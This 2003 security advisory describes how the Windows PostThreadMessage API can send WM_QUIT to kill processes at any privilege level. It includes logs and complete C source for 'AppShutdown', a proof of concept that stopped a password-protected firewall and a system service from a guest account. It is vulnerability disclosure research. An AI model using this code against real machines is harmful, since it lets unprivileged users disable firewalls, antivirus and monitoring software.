========================================================================= = Process Killing - Playing with PostThreadMessage = = brett.moore@security-assessment.com = http://www.security-assessment.com = = Originally posted: October 02, 2003 ========================================================================= == Background == While continuing our research into shatter attacks, we turned our attention to the PostThreadMessage API. (Start MSDN) - The PostThreadMessage function places (posts) a message in the message - queue of the specified thread and then returns without waiting for the - thread to process the message. - - BOOL PostThreadMessage( - DWORD idThread, // thread identifier - UINT Msg, // message to post - WPARAM wParam, // first message parameter - LPARAM lParam // second message - - The function fails if the specified thread does not have a message queue. - The system creates a thread's message queue when the thread makes its - first call to one of the Win32 USER or GDI functions. (End MSDN) It appears from our testing that any thread running under any security level will accept a WM_QUIT message, causing the process to terminate. (Start MSDN) - WM_QUIT - The WM_QUIT message indicates a request to terminate an application and - is generated when the application calls the PostQuitMessage function. - Return Values - This message does not have a return value, because it causes the message - loop to terminate before the message is sent to the application's window - procedure. (End MSDN) Similar results can also be seen in some cases through the use of sending WM_DESTROY or WM_CLOSE messages. While this does not have the security implications of 'privilege escalation' attacks, it may cause some concerns under certain circumstances. For our testing we used a personal firewall that runs as a service, and requires a password before terminating. When run from a guest account Appshutdown was able to kill the firewall service and various other windows services. This means that any user has the potential to shutdown; * antivirus applications * personal firewall applications * filtering applications * monitoring applications * potentially critical system services. The mitigating factor is that the thread is required to have a message queue. == Example Logs == The test.exe process is the personal firewall that requires a password before shutting down. The following logs are shortened outputs of the tlist and kill commands from the NTRK ------------------------------------------------------- C:\>tlist 208 WINLOGON.EXE NetDDE Agent 1020 test.exe TestFirewall 1132 mstask.exe SYSTEM AGENT COM WINDOW C:\>kill 1020 process test.exe (1020) - 'TestFirewall' killed C:\>kill 208 process WINLOGON.EXE (208) - 'NetDDE Agent' killed ------------------------------------------------------- Authough kill results in the messages above, what really happened was; a) the password prompt appeared when trying to kill 1020 b) the service remained running when trying to kill 208 ------------------------------------------------------- C:\>appshutdown "TestFirewall" % AppShutdown - Playing with PostThreadMessage % brett.moore@security-assessment.com + Finding TestFirewall Window... + Found Main Window At...0x30038h + Finding Window Thread..0x42ch Process 0x3fch + Send Quit Message + Done... C:\>appshutdown "NetDDE Agent" % AppShutdown - Playing with PostThreadMessage % brett.moore@security-assessment.com + Finding NetDDE Agent Window... + Found Main Window At...0x10018h + Finding Window Thread..0x110h Process 0xd0h + Send Quit Message + Done... ------------------------------------------------------- AppShutdown managed to successfully shutdown both services; a) bypassing the required password for the personal firewall b) bypassing the security restrictions placed on shutting down services == Example Code == /************************************************************************ * Appshutdown.c * * Demonstrates the use of PostThreadMessage to; * - shutdown any application with a message handler * * The window title can be specified in code or on the command line * * Works against any application/service process that * has implemented a message handler * *************************************************************************/ #include #include #include char tWindow[]="Windows Task Manager";// The name of the main window char* pWindow; int main(int argc, char *argv[]) { long hWnd,proc; DWORD hThread; printf("%% AppShutdown - Playing with PostThreadMessage\n"); printf("%% brett.moore@security-assessment.com\n\n"); // Specify Window Title On Command Line if (argc ==2) pWindow = argv[1]; else pWindow = tWindow; printf("+ Finding %s Window...\n",pWindow); hWnd = (long)FindWindow(NULL,pWindow); if(hWnd == NULL) { printf("+ Couldn't Find %s Window\n",pWindow); return 0; } printf("+ Found Main Window At...0x%xh\n",hWnd); printf("+ Finding Window Thread.."); hThread = GetWindowThreadProcessId(hWnd,&proc); if(hThread == NULL) { printf("Failed\n"); return 0; } printf("0x%xh Process 0x%xh\n",hThread,proc); printf("+ Send Quit Message\n"); PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0); printf("+ Done...\n"); return 0; } == Example Vulnerable Programs == >From our testing, any process that implements a message queue is vulnerable to been shutdown by a user of any security level. In some instances bypassing shutdown password requirements. This attack must be run through an interactive logon. == Credit == Brett Moore from security-assessment.com == About Security-Assessment.com == Security-Assessment.com is a leader in intrusion testing and security code review, and leads the world with SA-ISO, online ISO17799 compliance management solution. Security-Assessment.com is committed to security research and development, and its team have previously identified a number of vulnerabilities in public and private software vendors products.